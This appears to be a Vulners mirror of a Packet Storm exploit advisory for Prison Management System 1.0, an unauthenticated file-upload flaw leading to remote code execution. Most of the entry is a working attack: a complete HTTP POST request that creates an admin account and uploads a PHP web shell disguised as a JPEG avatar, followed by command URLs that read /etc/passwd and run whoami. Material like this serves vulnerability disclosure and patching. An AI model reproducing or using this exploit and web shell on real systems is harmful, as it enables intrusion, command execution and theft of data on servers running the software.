Vulners
Lucene search
Prison Management System 1.0 Shell Upload
🗓️ 25 Jul 2024 00:00:00Reported by Muhammet Ali DakType 
packetstorm🔗 packetstormsecurity.com👁 461 Views
`# Exploit Title: Prison Management System 1.0 - Unuthenticated RCE
# Date: 24.07.2024
# Exploit Author: Muhammet Ali Dak
# Vendor Homepage: https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=17287&title=Prison+Management+System+Using+PHP
# Version: 1.0
# Tested on: Linux
## Unauthenticated users can access /Admin/add-admin.php address and they can upload malicious php file by changing Content-Type to image/jpeg instead of profile picture image without any authentication.
POST /Admin/add-admin.php HTTP/1.1
Host: 192.168.60.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------84806108511207628902669766678
Content-Length: 1055
Origin: http://192.168.60.131
Connection: keep-alive
Referer: http://192.168.60.131/Admin/add-admin.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------84806108511207628902669766678
Content-Disposition: form-data; name="txtusername"
yuznumara
-----------------------------84806108511207628902669766678
Content-Disposition: form-data; name="txtfullname"
yuznumara
-----------------------------84806108511207628902669766678
Content-Disposition: form-data; name="txtpassword"
yuznumara123
-----------------------------84806108511207628902669766678
Content-Disposition: form-data; name="txtphone"
55353535353
-----------------------------84806108511207628902669766678
Content-Disposition: form-data; name="avatar"; filename="cmd.php"
Content-Type: image/jpeg
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
-----------------------------84806108511207628902669766678
Content-Disposition: form-data; name="btncreate"
-----------------------------84806108511207628902669766678--
## Malicious file can be seen under the path /uploadImage/Profile/ without any authentication.
## With the request http://192.168.60.131/uploadImage/Profile/cmd.php?cmd=whoami the attacker can execute arbitrary command on the application server.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jul 2024 00:00Current
7.4High risk
Vulners AI Score7.4